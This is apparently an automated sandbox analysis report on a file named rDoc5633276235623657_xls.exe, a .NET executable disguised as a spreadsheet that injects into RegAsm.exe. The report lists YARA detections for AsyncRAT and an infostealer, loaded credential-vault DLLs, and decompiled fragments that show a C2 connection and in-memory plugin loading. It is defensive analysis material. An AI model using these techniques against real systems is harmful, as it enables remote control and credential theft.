Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0133E250	2_2_0133E250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_013394A0	2_2_013394A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_01333B57	2_2_01333B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_01339D70	2_2_01339D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0133DC29	2_2_0133DC29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0133BC50	2_2_0133BC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_01339158	2_2_01339158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_01331628	2_2_01331628
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_066024E8	2_2_066024E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_06605670	2_2_06605670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0666B408	2_2_0666B408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_06661498	2_2_06661498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_06660040	2_2_06660040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0666DB20	2_2_0666DB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_06661488	2_2_06661488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0666F558	2_2_0666F558
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0666B3F8	2_2_0666B3F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0666A388	2_2_0666A388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_06660022	2_2_06660022
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_06660F28	2_2_06660F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_06660F18	2_2_06660F18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_06684A18	2_2_06684A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_066882D8	2_2_066882D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_06681010	2_2_06681010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_06681D48	2_2_06681D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_06684A08	2_2_06684A08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_066882CA	2_2_066882CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_06680FFF	2_2_06680FFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0668B7A4	2_2_0668B7A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0668B810	2_2_0668B810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_066879C8	2_2_066879C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_066849D8	2_2_066849D8

Source: rDoc5633276235623657_xls.exe, 00000000.00000000.1768699604.0000000000982000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameHSDSDF32.exe2 vs rDoc5633276235623657_xls.exe
Source: rDoc5633276235623657_xls.exe, 00000000.00000002.1783472169.00000000010AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs rDoc5633276235623657_xls.exe
Source: rDoc5633276235623657_xls.exe, 00000000.00000002.1784666277.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamekok.exe4 vs rDoc5633276235623657_xls.exe
Source: rDoc5633276235623657_xls.exe	Binary or memory string: OriginalFilenameHSDSDF32.exe2 vs rDoc5633276235623657_xls.exe

Source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.RegAsm.exe.6ad0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 2.2.RegAsm.exe.6ad0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000002.00000002.2652861730.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1784666277.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: rDoc5633276235623657_xls.exe, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: rDoc5633276235623657_xls.exe, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: rDoc5633276235623657_xls.exe, AesHelper.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\OeRWZLHs1gN7FCy5
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7008

Source: unknown	Process created: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe "C:\Users\user\Desktop\rDoc5633276235623657_xls.exe"
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7008 -s 2044
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior

Source: rDoc5633276235623657_xls.exe, DyyVDbaRvM1YfIq9il.cs	.Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.bTWUCGjumGB3L(16777255)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.bTWUCGjumGB3L(16777256)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.bTWUCGjumGB3L(16777253))})
Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, Messages.cs	.Net Code: Memory
Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.raw.unpack, Messages.cs	.Net Code: Memory
Source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.raw.unpack, Messages.cs	.Net Code: Memory

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0666773F push dword ptr [esp+ecx*2-75h]; ret	2_2_06667743
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_066638AD push es; ret	2_2_066638B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0668E798 pushad ; ret	2_2_0668E7A1

Source: rDoc5633276235623657_xls.exe, DyyVDbaRvM1YfIq9il.cs	High entropy of concatenated method names: 'D4r4O0AxSI', 'r0PUCGXjcJBvJ', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: rDoc5633276235623657_xls.exe, R2mIapWar4cwoqqx6Q.cs	High entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'

Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
